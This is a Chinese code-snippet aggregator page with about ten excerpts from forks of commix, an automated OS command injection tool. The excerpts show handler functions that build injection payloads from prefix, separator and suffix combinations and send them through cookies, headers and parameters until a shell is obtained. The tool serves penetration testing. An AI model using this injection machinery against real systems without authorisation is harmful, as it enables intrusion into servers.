当前位置: 首页>>代码示例>>Python>>正文


Python parameters.specify_cookie_parameter函数代码示例

本文整理汇总了Python中src.core.requests.parameters.specify_cookie_parameter函数的典型用法代码示例。如果您正苦于以下问题:Python specify_cookie_parameter函数的具体用法?Python specify_cookie_parameter怎么用?Python specify_cookie_parameter使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。


在下文中一共展示了specify_cookie_parameter函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: cookie_injection

def cookie_injection(url, http_request_method, filename, delay):

  settings.COOKIE_INJECTION = True

  # Cookie Injection
  if settings.COOKIE_INJECTION == True:
    cookie_value = menu.options.cookie

    header_name = " cookie"
    settings.HTTP_HEADER = header_name[1:].lower()
    cookie_parameters = parameters.do_cookie_check(menu.options.cookie)
    if type(cookie_parameters) is str:
      cookie_parameters_list = []
      cookie_parameters_list.append(cookie_parameters)
      cookie_parameters = cookie_parameters_list

    # Remove whitespaces 
    cookie_parameters = [x.replace(" ", "") for x in cookie_parameters]

    check_parameters = []
    for i in range(0, len(cookie_parameters)):
      menu.options.cookie = cookie_parameters[i]
      check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
      check_parameters.append(check_parameter)

    checks.print_non_listed_params(check_parameters, http_request_method, header_name)

    for i in range(0, len(cookie_parameters)):
      menu.options.cookie = cookie_parameters[i]
      check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
      if len(check_parameter) > 0:
        settings.TESTABLE_PARAMETER = check_parameter 
      # Check if testable parameter(s) are provided
      if len(settings.TEST_PARAMETER) > 0:
        if check_parameter in settings.TEST_PARAMETER:
          # Check for session file 
          check_for_stored_sessions(url, http_request_method)
          injection_proccess(url, check_parameter, http_request_method, filename, delay) 
      else:
        # Check for session file 
        check_for_stored_sessions(url, http_request_method)
        injection_proccess(url, check_parameter, http_request_method, filename, delay) 
 
  if settings.COOKIE_INJECTION == True:
    # Restore cookie value
    menu.options.cookie = cookie_value
    # Disable cookie injection 
    settings.COOKIE_INJECTION = False
开发者ID:HugoDelval,项目名称:commix,代码行数:48,代码来源:controller.py

示例2: eb_injection_handler

def eb_injection_handler(url, delay, filename, http_request_method):
  
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "Results-based Command Injection"
  technique = "eval-based injection technique"
  
  sys.stdout.write("(*) Testing the "+ technique + "... ")
  sys.stdout.flush()
    
  i = 0
  # Calculate all possible combinations
  total = len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES)
  
  for prefix in settings.EVAL_PREFIXES:
    for suffix in settings.EVAL_SUFFIXES:
      for separator in settings.EVAL_SEPARATORS:
        i = i + 1
        
        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""

        # Change TAG on every request to prevent false-positive results.
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))

        randv1 = random.randrange(100)
        randv2 = random.randrange(100)
        randvcalc = randv1 + randv2

        try:
          # Eval-based decision payload (check if host is vulnerable).
          payload = eb_payloads.decision(separator, TAG, randv1, randv2)
          
          # Fix prefixes / suffixes
          payload = parameters.prefixes(payload, prefix)
          payload = parameters.suffixes(payload, urllib.quote(suffix))

          payload = payload + "" + TAG + ""
          payload = re.sub(" ", "%20", payload)

          # Check if defined "--verbose" option.
          if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)

          # Cookie Injection
          if settings.COOKIE_INJECTION == True:
            # Check if target host is vulnerable to cookie injection.
            vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
            response = eb_injector.cookie_injection_test(url, vuln_parameter, payload)

          # User-Agent Injection
          elif settings.USER_AGENT_INJECTION == True:
            # Check if target host is vulnerable to user-agent injection.
            vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
            response = eb_injector.user_agent_injection_test(url, vuln_parameter, payload)

          # Referer Injection
          elif settings.REFERER_INJECTION == True:
            # Check if target host is vulnerable to referer injection.
            vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
            response = eb_injector.referer_injection_test(url, vuln_parameter, payload)

          else:
            found_cookie_injection = False
            # Check if target host is vulnerable.
            response, vuln_parameter = eb_injector.injection_test(payload, http_request_method, url)         
  
          # if need page reload
          if menu.options.url_reload: 
            time.sleep(delay)
            response = urllib.urlopen(url)
            
          # Evaluate test results.
          shell = eb_injector.injection_test_results(response, TAG, randvcalc)
          if not menu.options.verbose:
            percent = ((i*100)/total)
            if percent == 100:
              if no_result == True:
                percent = Fore.RED + "FAILED" + Style.RESET_ALL
              else:
                percent = str(percent)+"%"
            elif len(shell) != 0:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
            else:
              percent = str(percent)+"%"
            sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
            sys.stdout.flush()
            
        except KeyboardInterrupt: 
          raise
          
        except:
          continue
        
        # Yaw, got shellz! 
        # Do some magic tricks!
#.........这里部分代码省略.........
开发者ID:alvinhsian,项目名称:commix,代码行数:101,代码来源:eb_handler.py

示例3: cb_injection_handler

def cb_injection_handler(url, timesec, filename, http_request_method):
  shell = False
  counter = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  export_injection_info = False
  injection_type = "results-based OS command injection"
  technique = "classic command injection technique"

  if not settings.LOAD_SESSION: 
    info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()
    if settings.VERBOSITY_LEVEL >= 1:
      print ""
      
  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
  for whitespace in settings.WHITESPACE:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:
          if whitespace == " ":
            whitespace = urllib.quote(whitespace) 
          # Check injection state
          settings.DETECTION_PHASE = True
          settings.EXPLOITATION_PHASE = False
          # If a previous session is available.
          if settings.LOAD_SESSION and session_handler.notification(url, technique, injection_type):
            try:
              settings.CLASSIC_STATE = True
              url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
              checks.check_for_stored_tamper(payload)
            except TypeError:
              err_msg = "An error occurred while accessing session file ('"
              err_msg += settings.SESSION_FILE + "'). "
              err_msg += "Use the '--flush-session' option."
              print settings.print_critical_msg(err_msg)
              raise SystemExit()

          else:
            i = i + 1
            # Check for bad combination of prefix and separator
            combination = prefix + separator
            if combination in settings.JUNK_COMBINATION:
              prefix = ""

            # Change TAG on every request to prevent false-positive results.
            TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
            
            randv1 = random.randrange(100)
            randv2 = random.randrange(100)
            randvcalc = randv1 + randv2
            
            # Define alter shell
            alter_shell = menu.options.alter_shell
            
            try:
              if alter_shell:
                # Classic -alter shell- decision payload (check if host is vulnerable).
                payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
              else:
                # Classic decision payload (check if host is vulnerable).
                payload = cb_payloads.decision(separator, TAG, randv1, randv2)
              
              # Define prefixes & suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = payload.replace(" ", whitespace)
              
              # Perform payload modification
              payload = checks.perform_payload_modification(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL == 1:
                print settings.print_payload(payload)
              elif settings.VERBOSITY_LEVEL > 1:
                info_msg = "Generating a payload for injection..."
                print settings.print_info_msg(info_msg)
                print settings.print_payload(payload) 
                
              # Cookie header injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie header injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                response = cb_injector.cookie_injection_test(url, vuln_parameter, payload)
                
              # User-Agent HTTP header injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent HTTP header injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload)

              # Referer HTTP header injection
              elif settings.REFERER_INJECTION == True:
                # Check if target host is vulnerable to referer HTTP header injection.
#.........这里部分代码省略.........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:cb_handler.py

示例4: fb_injection_handler


#.........这里部分代码省略.........
        i = i + 1
        # Change TAG on every request to prevent false-positive results.
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
        # The output file for file-based injection technique.
        OUTPUT_TEXTFILE = TAG + ".txt"    
        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""

        try:
          # File-based decision payload (check if host is vulnerable).
          if alter_shell :
            payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
          else:
            payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
                  
          # Check if defined "--prefix" option.
          # Fix prefixes / suffixes
          payload = parameters.prefixes(payload, prefix)
          payload = parameters.suffixes(payload, suffix)

          if menu.options.base64:
            payload = base64.b64encode(payload)

          # Check if defined "--verbose" option.
          if menu.options.verbose:
            print "(*) Trying to upload the '" + OUTPUT_TEXTFILE + "' file on '" + settings.SRV_ROOT_DIR + "'..."
            print Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL

          # Cookie Injection
          if settings.COOKIE_INJECTION == True:
            # Check if target host is vulnerable to cookie injection.
            vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
            response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)

          # User-Agent Injection
          elif settings.USER_AGENT_INJECTION == True:
            # Check if target host is vulnerable to user-agent injection.
            vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
            response = fb_injector.user_agent_injection_test(url, vuln_parameter, payload)          

          # Referer Injection
          elif settings.REFERER_INJECTION == True:
            # Check if target host is vulnerable to referer injection.
            vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
            response = fb_injector.referer_injection_test(url, vuln_parameter, payload)

          else:
            # Check if target host is vulnerable.
            response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url)

          # Find the directory.
          output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay)
          time.sleep(delay)
          
          try:
            # Check if defined extra headers.
            request = urllib2.Request(output)
            headers.do_check(request)
            
            # Evaluate test results.
            output = urllib2.urlopen(request)
            html_data = output.read()
            shell = re.findall(r"" + TAG + "", html_data)
开发者ID:x3omdax,项目名称:commix,代码行数:66,代码来源:fb_handler.py

示例5: tfb_injection_handler

def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
  
  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  export_injection_info = False
  
  injection_type = "Semiblind-based Command Injection"
  technique = "tempfile-based injection technique"
  
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
  
  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
    
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1

        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""

        # Change TAG on every request to prevent false-positive resutls.
        TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))  

        # The output file for file-based injection technique.
        OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
        alter_shell = menu.options.alter_shell
        tag_length = len(TAG) + 4
        
        for output_length in range(1, int(tag_length)):
          try:

            # Tempfile-based decision payload (check if host is vulnerable).
            if alter_shell :
              payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
            else:
              payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)

            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)
              
            # Check if defined "--verbose" option.
            if menu.options.verbose:
              if separator == ";" or separator == "&&" or separator == "||":
                print Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
                
            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
              
            # User-Agent Injection
            elif settings.USER_AGENT_INJECTION == True:
              # Check if target host is vulnerable to user-agent injection.
              vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
              how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)

            # Referer Injection
            elif settings.REFERER_INJECTION == True:
              # Check if target host is vulnerable to referer injection.
              vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
              how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)

            # Injection percentage calculation
            percent = ((num_of_chars * 100) / total)

            if percent == 100 and no_result == True:
              if not menu.options.verbose:
                percent = Fore.RED + "FAILED" + Style.RESET_ALL
              else:
                percent = ""
            else:
              if (url_time_response <= 1 and how_long >= delay) or \
              (url_time_response >= 2 and how_long > delay):

                # Time relative false positive fixation.
                randv1 = random.randrange(0, 1)
                randv2 = random.randrange(1, 2)
                randvcalc = randv1 + randv2

                cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))"
                output  = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell)
#.........这里部分代码省略.........
开发者ID:xstpl,项目名称:commix,代码行数:101,代码来源:tfb_handler.py

示例6: tfb_injection_handler

def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
    # percent = "0.2"
    counter = 1
    num_of_chars = 1
    vp_flag = True
    no_result = True
    is_encoded = False
    is_vulnerable = False
    how_long_statistic = 0
    export_injection_info = False
    how_long = 0
    injection_type = "Semiblind Command Injection"
    technique = "tempfile-based injection technique"

    # Check if defined "--maxlen" option.
    if menu.options.maxlen:
        maxlen = settings.MAXLEN

    # Check if defined "--url-reload" option.
    if menu.options.url_reload == True:
        print Back.RED + "(x) Error: The '--url-reload' option is not available in " + technique + "!" + Style.RESET_ALL

    # percent = str(percent)+ "%"
    # sys.stdout.write("\r(*) Testing the " + technique + "... " +  "[ " + percent + " ]")
    # sys.stdout.flush()

    # Calculate all possible combinations
    total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)

    for prefix in settings.PREFIXES:
        for suffix in settings.SUFFIXES:
            for separator in settings.SEPARATORS:
                num_of_chars = num_of_chars + 1

                # Check for bad combination of prefix and separator
                combination = prefix + separator
                if combination in settings.JUNK_COMBINATION:
                    prefix = ""

                # Change TAG on every request to prevent false-positive resutls.
                TAG = "".join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))

                # The output file for file-based injection technique.
                OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
                alter_shell = menu.options.alter_shell
                tag_length = len(TAG) + 4

                for output_length in range(1, int(tag_length)):
                    try:
                        # Tempfile-based decision payload (check if host is vulnerable).
                        if alter_shell:
                            payload = tfb_payloads.decision_alter_shell(
                                separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method
                            )
                        else:
                            payload = tfb_payloads.decision(
                                separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method
                            )

                        # Fix prefixes / suffixes
                        payload = parameters.prefixes(payload, prefix)
                        payload = parameters.suffixes(payload, suffix)

                        # Encode payload to Base64
                        if menu.options.base64:
                            payload = base64.b64encode(payload)

                        # Check if defined "--verbose" option.
                        if menu.options.verbose:
                            sys.stdout.write(
                                "\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
                            )

                        # Cookie Injection
                        if settings.COOKIE_INJECTION == True:
                            # Check if target host is vulnerable to cookie injection.
                            vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                            how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)

                        # User-Agent Injection
                        elif settings.USER_AGENT_INJECTION == True:
                            # Check if target host is vulnerable to user-agent injection.
                            vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                            how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)

                        # Referer Injection
                        elif settings.REFERER_INJECTION == True:
                            # Check if target host is vulnerable to referer injection.
                            vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
                            how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload)

                        else:
                            # Check if target host is vulnerable.
                            how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)

                        # Injection percentage calculation
                        percent = (num_of_chars * 100) / total
                        float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (total * 1.0)), 2))

                        # Statistical analysis in time responses.
#.........这里部分代码省略.........
开发者ID:aka99,项目名称:commix,代码行数:101,代码来源:tfb_handler.py

示例7: tb_injection_handler

def tb_injection_handler(url, delay, filename, http_request_method, url_time_response):

  percent = 0
  counter = 1
  num_of_chars = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  is_vulnerable = False
  export_injection_info = False
  how_long = 0
  injection_type = "Blind Command Injection"
  technique = "time-based injection technique"

  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = settings.MAXLEN
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Fore.YELLOW + "(^) Warning: The '--url-reload' option is not available in "+ technique +"." + Style.RESET_ALL
  
  percent = str(percent)+"%"
  sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
  sys.stdout.flush()

  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))

  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1

        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""
        
        # Define alter shell
        alter_shell = menu.options.alter_shell
        
        # Change TAG on every request to prevent false-positive results.
        TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
        tag_length = len(TAG) + 4
        
        for output_length in range(1, int(tag_length)):
          try:

            # Log previous 'how_long' for later comparison
            previous_how_long = how_long

            if alter_shell:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method)
            else:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method)

            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)

            if menu.options.base64:
              payload = base64.b64encode(payload)

            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)

            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload)

            # User-Agent Injection
            elif settings.USER_AGENT_INJECTION == True:
              # Check if target host is vulnerable to user-agent injection.
              vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
              how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload)

            # Referer Injection
            elif settings.REFERER_INJECTION == True:
              # Check if target host is vulnerable to referer injection.
              vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
              how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url)
            
            # Injection percentage calculation
            percent = ((num_of_chars * 100) / total)
            float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total * 1.0)),2))

            if percent == 100 and no_result == True:
              if not menu.options.verbose:
                percent = Fore.RED + "FAILED" + Style.RESET_ALL
              else:
#.........这里部分代码省略.........
开发者ID:BwRy,项目名称:commix,代码行数:101,代码来源:tb_handler.py

示例8: tfb_injection_handler

def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method):
  
  counter = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  fixation = False
  export_injection_info = False
  injection_type = "Semiblind-based Command Injection"
  technique = "tempfile-based injection technique"
  
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
  
  num_of_chars = 0
  # Calculate all possible combinations
  total = len(settings.SEPARATORS)
  
  # Estimating the response time (in seconds)
  request = urllib2.Request(url)
  headers.do_check(request)
  start = time.time()
  response = urllib2.urlopen(request)
  response.read(1)
  response.close()
  end = time.time()
  diff = end - start
  url_time_response = int(diff)
  if url_time_response != 0 :
    print Style.BRIGHT + "(!) The estimated response time is " + str(url_time_response) + " second" + "s"[url_time_response == 1:] + "." + Style.RESET_ALL
  delay = int(delay) + int(url_time_response)
  
  for separator in settings.SEPARATORS:
    num_of_chars = num_of_chars + 1
          
    # Change TAG on every request to prevent false-positive resutls.
    TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))  

    # The output file for file-based injection technique.
    OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
    alter_shell = menu.options.alter_shell
    tag_length = len(TAG) + 4
    
    for output_length in range(1, int(tag_length)):
      try:

        # Tempfile-based decision payload (check if host is vulnerable).
        if alter_shell :
          payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
        else:
          payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
          if separator == ";" or separator == "&&" or separator == "||":
            sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
            
        # Cookie Injection
        if settings.COOKIE_INJECTION == True:
          # Check if target host is vulnerable to cookie injection.
          vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
          how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
        else:
          # Check if target host is vulnerable.
          how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)

        if not menu.options.verbose:
          percent = ((num_of_chars*100)/total)
          if how_long >= delay:
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          elif percent == 100:
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
            else:
                percent = str(percent)+"%"
          else:
            percent = str(percent)+"%"
          sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
          sys.stdout.flush()
          
      except KeyboardInterrupt: 
        raise
      
      except:
        if not menu.options.verbose:
          percent = ((num_of_chars*100)/total)
          
          if percent == 100:
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              break
            else:
              percent = str(percent)+"%"
#.........这里部分代码省略.........
开发者ID:theralfbrown,项目名称:commix,代码行数:101,代码来源:tfb_handler.py

示例9: do_check


#.........这里部分代码省略.........
            injection_proccess(url, check_parameter, http_request_method, filename, delay)
      else:
        if check_for_stored_sessions(url, http_request_method):
          injection_proccess(url, check_parameter, http_request_method, filename, delay)

    if not settings.LOAD_SESSION :
      for i in range(0, len(found_parameter)):
        parameter = menu.options.data = found_parameter[i]
        check_parameter =  parameters.vuln_POST_param(parameter, url)
        # Check if testable parameter(s) are provided
        if len(settings.TEST_PARAMETER) > 0:
          if check_parameter in settings.TEST_PARAMETER:
            injection_proccess(url, check_parameter, http_request_method, filename, delay)
        else:
          injection_proccess(url, check_parameter, http_request_method, filename, delay)  

  # Enable Cookie Injection
  if menu.options.cookie and menu.options.level > 1:
    settings.COOKIE_INJECTION = True

  # Cookie Injection
  if settings.COOKIE_INJECTION == True:
    cookie_value = menu.options.cookie
    # Check for stored injections on User-agent / Referer headers (if level > 2).
    if menu.options.level > 2 :
      check_parameter = ""
      stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)

    header_name = " Cookie"
    settings.HTTP_HEADER = header_name[1:].lower()
    cookie_parameters = parameters.do_cookie_check(menu.options.cookie)
    if type(cookie_parameters) is str:
      cookie_parameters_list = []
      cookie_parameters_list.append(cookie_parameters)
      cookie_parameters = cookie_parameters_list

    # Remove whitespaces 
    cookie_parameters = [x.replace(" ", "") for x in cookie_parameters]

    for i in range(0, len(cookie_parameters)):
      menu.options.cookie = cookie_parameters[i]
      check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
      if len(check_parameter) > 0:
        settings.TESTABLE_PARAMETER = check_parameter 
      # Check if testable parameter(s) are provided
      if len(settings.TEST_PARAMETER) > 0:
        if check_parameter in settings.TEST_PARAMETER:
          # Check for session file 
          if check_for_stored_sessions(url, http_request_method):
            injection_proccess(url, check_parameter, http_request_method, filename, delay)
      else:
        if check_for_stored_sessions(url, http_request_method):
          injection_proccess(url, check_parameter, http_request_method, filename, delay)

    if not settings.LOAD_SESSION :
      for i in range(0, len(cookie_parameters)):
        menu.options.cookie = cookie_parameters[i]
        check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
        if len(check_parameter) > 0:
          settings.TESTABLE_PARAMETER = check_parameter 
        # Check if testable parameter(s) are provided
        if len(settings.TEST_PARAMETER) > 0:
          if check_parameter in settings.TEST_PARAMETER:
            injection_proccess(url, check_parameter, http_request_method, filename, delay)
        else:
          injection_proccess(url, check_parameter, http_request_method, filename, delay)
  
  if settings.COOKIE_INJECTION == True:
    # Restore cookie value
    menu.options.cookie = cookie_value
    # Disable cookie injection 
    settings.COOKIE_INJECTION = False

  # Custom header Injection
  if settings.CUSTOM_HEADER_INJECTION == True:
    check_parameter =  header_name = " " + settings.CUSTOM_HEADER_NAME
    settings.HTTP_HEADER = header_name[1:].lower()
    check_for_stored_sessions(url, http_request_method)
    injection_proccess(url, check_parameter, http_request_method, filename, delay)

  # Check for stored injections on User-agent / Referer headers (if level > 2).
  if menu.options.level > 2 :
    check_parameter = ""
    check_http_headers = True
    stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)

  # All injection techniques seems to be failed!
  if settings.CLASSIC_STATE == settings.EVAL_BASED_STATE == settings.TIME_BASED_STATE == settings.FILE_BASED_STATE == False :
    info_msg = settings.CRITICAL_SIGN + "All the tested (" + http_request_method + ") parameters appear to be not injectable."
    if not menu.options.alter_shell :
      info_msg += " Try to use the option '--alter-shell'"
    else:
      info_msg += " Try to remove the option '--alter-shell'"
    if menu.options.level < 3 :
      info_msg += " and/or try to increase '--level' values to perform more tests (i.e 'User-Agent', 'Referer', 'Cookie' etc)"
    info_msg += "."
    print Back.RED + info_msg + Style.RESET_ALL  
  sys.exit(0)

#eof
开发者ID:linuxwhy,项目名称:commix,代码行数:101,代码来源:controller.py

示例10: fb_injection_handler

def fb_injection_handler(url, delay, filename, http_request_method, url_time_response):
  
  counter = 1
  failed_tries = 20
  vp_flag = True
  exit_loops = False
  no_result = True
  is_encoded= False
  stop_injection = False
  call_tmp_based = False
  export_injection_info = False
  
  injection_type = "Semiblind-based Command Injection"
  technique = "file-based semiblind injection technique"

  # Set temp path 
  if menu.options.tmp_path:
    tmp_path = menu.options.tmp_path
  else:
    tmp_path = settings.TMP_PATH
                  
  print "(*) Testing the "+ technique + "... "
    
  if menu.options.file_dest:
    if '/tmp/' in menu.options.file_dest:
      call_tmp_based = True
    SRV_ROOT_DIR = os.path.split(menu.options.file_dest)[0]
  else:
    if menu.options.srv_root_dir:
      SRV_ROOT_DIR = menu.options.srv_root_dir
    else:
      SRV_ROOT_DIR = settings.SRV_ROOT_DIR
  
  i = 0
  # Calculate all possible combinations
  total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)

  # Check if defined alter shell
  alter_shell = menu.options.alter_shell
  
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        i = i + 1
        
        # Change TAG on every request to prevent false-positive results.
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
          
        # The output file for file-based injection technique.
        OUTPUT_TEXTFILE = TAG + ".txt"
                    
        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""

        try:
          # File-based decision payload (check if host is vulnerable).
          if alter_shell :
            payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
          else:
            payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
                  
          # Check if defined "--prefix" option.
          # Fix prefixes / suffixes
